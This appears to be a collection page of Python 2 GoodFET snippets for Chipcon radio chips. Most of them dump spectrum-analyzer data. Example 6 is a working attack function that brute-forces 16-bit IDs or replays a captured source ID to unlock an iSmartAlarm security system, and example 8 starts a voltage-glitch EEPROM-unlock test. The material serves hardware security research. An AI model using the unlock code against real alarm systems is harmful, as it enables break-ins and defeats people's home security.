Esempio n. 1
# ------------------------------------------------------------------------------
# | Marker | MSB Loop | LSB Loop | channel | channel | ... | channel | channel |
# | 0xFE   | Count    | Count    | number  | rssi    | ... | number  | rssi    |
# ------------------------------------------------------------------------------

import sys;
import Gnuplot as plt

# sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
sys.path.append('/home/cutaway/Hardware/Goodfet/trunk/client/')

from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;
import time;

# Bring up the GoodFET: serial link first, then the Chipcon session.
client = GoodFETCC()
client.serInit()
client.setup()
client.start()

# Halt the target CPU and release it straight away, then pause for one
# second before anything further happens.
client.CChaltcpu()
client.CCreleasecpu()
time.sleep(1)

# Presumably the start address and channel count of the sweep data whose
# frame layout is drawn in the header comment; the code that uses them is
# not shown in this excerpt.
chanstart = 0xf000
# maxchan = 132
maxchan = 53
# NOTE(review): shadows the builtin round(); name kept because the rest of
# the script is not visible here.
round = 0

g = plt.Gnuplot()
Esempio n. 2
# GoodFET Chipcon Example
#                                                                                                                                          
# (C) 2009 Travis Goodspeed <travis at radiantmachines.com>
#                                                                                                                                          
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.                                                                                                              

import sys;

sys.path.append('/Users/travis/svn/goodfet/trunk/client/')

from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;
import time;

# Bring up the GoodFET: serial link first, then the Chipcon session.
client = GoodFETCC()
client.serInit()
client.setup()
client.start()

# Region of target data memory that the loop below reads one byte at a time.
# 8 * 132 is presumably 8 bytes for each of 132 channels; confirm against
# the analyzer firmware's record layout.
bytestart = 0xf000
bytescount = 8 * 132

while 1:
    time.sleep(1);
    client.CChaltcpu();
    
    dump="";
    for foo in range(0,bytescount):
        dump=("%s %02x" % (dump,client.CCpeekdatabyte(bytestart+foo)));
Esempio n. 3
# GoodFET Chipcon Example
#
# (C) 2009 Travis Goodspeed <travis at radiantmachines.com>
#
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.

import sys

sys.path.append('/Users/travis/svn/goodfet/trunk/client/')

from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex
import time

# Bring up the GoodFET: serial link first, then the Chipcon session.
client = GoodFETCC()
client.serInit()

client.setup()
client.start()
# Halt the target CPU and release it straight away, then pause for a second.
client.CChaltcpu()
client.CCreleasecpu()

time.sleep(1)

# Presumably the base address and channel count of the analyzer's result
# buffer; the code that reads it is not shown in this excerpt.
bytestart = 0xf800
maxchan = 132
# NOTE(review): shadows the builtin round(); left as is because later code
# may reference it.
round = 0

# Column header for the whitespace-separated records that follow.
print "time freq rssi"
Esempio n. 4
# sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
sys.path.append('/home/cutaway/Hardware/Goodfet/trunk/client/')

from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex
import time

# Sleep intervals, every value expressed in seconds.
sshsi = 1          # 1 s
shsi = 10          # 10 s
mdsi = 60          # 1 min
lgsi = 2 * 60      # 2 min
xlgsi = 20 * 60    # 20 min

# Bring up the GoodFET: serial link first, then the Chipcon session.
client = GoodFETCC()
client.serInit()

client.setup()
client.start()

# Start and stop if previously something failed
# (halt followed by an immediate release, so the target is left running).
client.CChaltcpu()
client.CCreleasecpu()

# Approximate frequency in MHz for each channel number.
# Channels run 0..52 in 0.5 MHz steps, i.e. 902 MHz up to 928 MHz.
# range() excludes its upper bound, so 53 is needed to include channel 52.
max_chan = 53
chan_dict = {chan: 902 + chan * .5 for chan in range(max_chan)}
Esempio n. 5
# GoodFET Chipcon Example
#                                                                                                                                          
# (C) 2009 Travis Goodspeed <travis at radiantmachines.com>
#                                                                                                                                          
# This code is being rewritten and refactored.  You've been warned!                                                                                                                

import sys;
import binascii;

sys.path.append('/Users/travis/svn/goodfet/trunk/client/')

from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;


# Bring up the GoodFET: serial link first, then the Chipcon session.
client = GoodFETCC()
client.serInit()
client.setup()
client.start()

# Running counters; the code that updates them is not shown in this excerpt.
bytecount = 0
lastcount = 0

# Presumably the size and start address of the region sampled per pass.
bytescount = 64
bytestart = 0x0C

# NOTE(review): `bytes` and `file` below shadow builtins; the names are kept
# because the rest of the script is not visible here.
bytes = []

f = "random.bin"  # sys.argv[1]
# Opened for binary writing; nothing in this excerpt closes the handle.
file = open(f, mode='wb')
Esempio n. 6
def attack(attack_type):
    """Flash an ID record to the Chipcon target via GoodFET and poke the Arduino.

    ``attack_type`` is compared against the strings '0' and '2':

    * '0'  -- walk a counter from 1 to 65535, patch it into bytes 13-14 of a
      fixed 16-byte template, and flash/poke once per value.
    * '2'  -- build the record from the module-level ``src_id``, wait for
      ENTER, then flash/poke once.
    * else -- same as '2', but sleep ``args.delay`` seconds instead of
      prompting.

    Reads the globals ``args`` (``port``, ``delay``) and ``src_id`` and
    rebinds the global ``ser``.  Any ``Exception`` is caught, printed and
    followed by ``exit_clean()``.  ``data``, ``offset``, ``serialpoke``,
    ``exit_clean`` and the colour helpers are defined outside this block.

    NOTE(review): read defensively, both branches depend on the receiver
    accepting a frame keyed only on a static identifier -- one branch reuses
    a captured ``src_id`` unchanged, the other walks a 16-bit field.  A
    receiver that binds each frame to a rolling counter or a keyed MAC would
    presumably reject both.  Each attempt here sleeps 3.1 s, so a run of
    frames with sequentially changing IDs is slow and should be visible to
    receiver-side rate limiting or logging.
    """
    try:
        global ser
        global args

        # Value handed to serialpoke() after every flash.
        byte = '1'

        #Initialize GoodFET serial port connection
        client = GoodFETCC()
        client.serInit()

        # Connect to GoodFET
        client.setup()

        # Initialize GoodFET client multiple times, this is due to poor JTAG latching
        client.start()
        client.start()
        client.start()
        client.start()

        # Open serial pipe to Arduino
        # (9600 baud; timeout=0 puts pyserial reads in non-blocking mode).
        # Nothing in this function closes the port; presumably exit_clean()
        # does -- confirm.
        ser = serial.Serial(args.port, 9600, timeout=0)

        if attack_type == '0':
            clearscreen()

            # 16-byte template as hex; `id` and `bytes` shadow builtins.
            id = 'FFFFFFFFFFFFFF0000000000070000FF'
            bytes = bytearray.fromhex(id)

            counter = 0  #38520

            while True:
                if counter == 65535:
                    break
                counter += 1
                # offset() is defined elsewhere; presumably it returns the
                # counter as four hex digits, i.e. two bytes -- confirm.
                bytes[13:15] = unhexlify(offset(counter))

                # data() is defined elsewhere; its output is followed by
                # ':00000001FF', the Intel HEX end-of-file record, and
                # wrapped in a file-like object for client.flash().
                # 32752 == 0x7FF0, presumably the load address -- confirm.
                f = StringIO(data(32752, bytes) + '\n:00000001FF')
                print pink("IHEX:\n" + f.getvalue() + '\n')
                client.flash(f)
                f.close()

                # Stop the debug session, wait, poke the Arduino, wait again,
                # then restart the session for the next record.
                client.stop()
                sleep(2.5)
                serialpoke(byte)
                sleep(0.6)
                client.start()
            print green(
                "[SUCCESS] All 65536 ID's have been exhausted, good day.")
            exit_clean()

        else:

            global src_id

            print green(
                "[SUCCESS] Source ID captured from iSmartAlarm remote or sensor, attempting unlock...\n"
            )

            # Same frame shape as above with src_id spliced in verbatim.
            # bytearray.fromhex() raises ValueError on malformed hex, which
            # the handler at the bottom reports.
            id = 'FFFFFFFFFFFFFF00000000' + src_id + 'FF'
            bytes = bytearray.fromhex(id)

            if attack_type == '2':
                raw_input('Press [ENTER] when ready to unlock:')
            else:
                print yellowbold(
                    "[INFO] Delay mode enabled. Waiting %i seconds till unlock"
                    % args.delay)
                sleep(args.delay)

            # Single flash/poke cycle; unlike the loop above, the session is
            # not restarted afterwards.
            f = StringIO(data(32752, bytes) + '\n:00000001FF')
            print pink("IHEX:\n" + f.getvalue() + '\n')
            client.flash(f)
            f.close()

            client.stop()
            sleep(2.5)
            serialpoke(byte)
            sleep(0.6)
        # Reached after the else branch, and after the '0' branch only if the
        # exit_clean() call there returns.
        print green("[SUCCESS] Hopefully unlocked :D")
        exit_clean()

    # Python 2 except syntax; catches every Exception subclass, so hardware,
    # serial and parsing failures all end up in the same message.
    except Exception, e:
        print red("\n[ERROR] An error occured while flashing ID's\n\t%s" % e)
        exit_clean()
Esempio n. 7
#
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.
#
#
#

import sys

sys.path.append('/Users/travis/svn/goodfet/trunk/client/')

from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex
import time

# Bring up the GoodFET: serial link first, then the Chipcon session.
client = GoodFETCC()
client.serInit()

client.setup()
client.start()
# Halt the target CPU and release it straight away, then pause for a second.
client.CChaltcpu()
client.CCreleasecpu()

time.sleep(1)

# Presumably the base address, byte length and channel count of the
# analyzer's result buffer (8 bytes for each of 132 channels); the code
# that reads it is not shown in this excerpt.
bytestart = 0xf000
bytescount = 8 * 132
maxchan = 132
# NOTE(review): shadows the builtin round(); left as is because later code
# may reference it.
round = 0

# Column header for the whitespace-separated records that follow.
print "time freq rssi rssimax"
Esempio n. 8
import sys,binascii,time,random;

# Make the GoodFET client modules importable (presumably from a repository
# checkout three directories up).
# NOTE(review): the path is relative, so Python resolves it against the
# process's current working directory, not this script's location; launched
# from elsewhere, the imports below may fail or pick up same-named modules
# from an unintended directory.
sys.path.append('../../../trunk/client/')

from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;

import sqlite3;

# Results database: one `glitches` table, created on first run, with
# untyped columns time, vcc, gnd, trials, glitchcount and count.
db = sqlite3.connect("glitch.db")
db.execute("create table if not exists glitches(time,vcc,gnd,trials,glitchcount,count)")

# Initialize FET and set baud rate.
# Unlike the other GoodFET examples on this page, setup() is not called.
client = GoodFETCC()
client.serInit()

print "-- GoodFET EEPROM Unlock test."
print "-- Count of reads with voltage glitch."

# Start the target session and erase the chip.
client.start()
client.erase()

# Byte value the loop that follows expects to read back at code address 0.
secret = 0x69

#Erase chip for baseline.
while(client.CCpeekcodebyte(0)!=secret):
    print "-- Setting secret";
    client.start();
    
Esempio n. 9
#
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.
#
#
#

import sys;

sys.path.append('/Users/travis/svn/goodfet/trunk/client/')

from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;
import time;

# Bring up the GoodFET: serial link first, then the Chipcon session.
client = GoodFETCC()
client.serInit()
client.setup()
client.start()

# Halt the target CPU and release it straight away, then pause for a second.
client.CChaltcpu()
client.CCreleasecpu()
time.sleep(1)

# Presumably the base address, byte length and channel count of the
# analyzer's result buffer (8 bytes for each of 132 channels); the code
# that reads it is not shown in this excerpt.
bytestart = 0xf000
bytescount = 8 * 132
maxchan = 132
# NOTE(review): shadows the builtin round(); name kept because the rest of
# the script is not visible here.
round = 0

# Column header for the whitespace-separated records that follow.
print "time freq rssi rssimax"